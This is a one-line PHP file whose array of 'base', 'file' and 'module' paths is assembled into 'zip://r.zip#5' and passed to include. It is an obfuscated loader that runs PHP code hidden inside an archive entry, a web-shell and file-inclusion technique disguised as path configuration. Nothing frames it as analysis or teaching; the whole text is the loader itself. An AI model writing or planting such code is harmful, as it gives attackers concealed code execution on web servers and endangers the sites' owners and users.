<?php $paths = [ 'base' => ['zip:/'], 'file' => ['/r.zip#'], 'module' => ['5'] ]; include implode("", array_map(fn($p) => $p[0], $paths)); ?>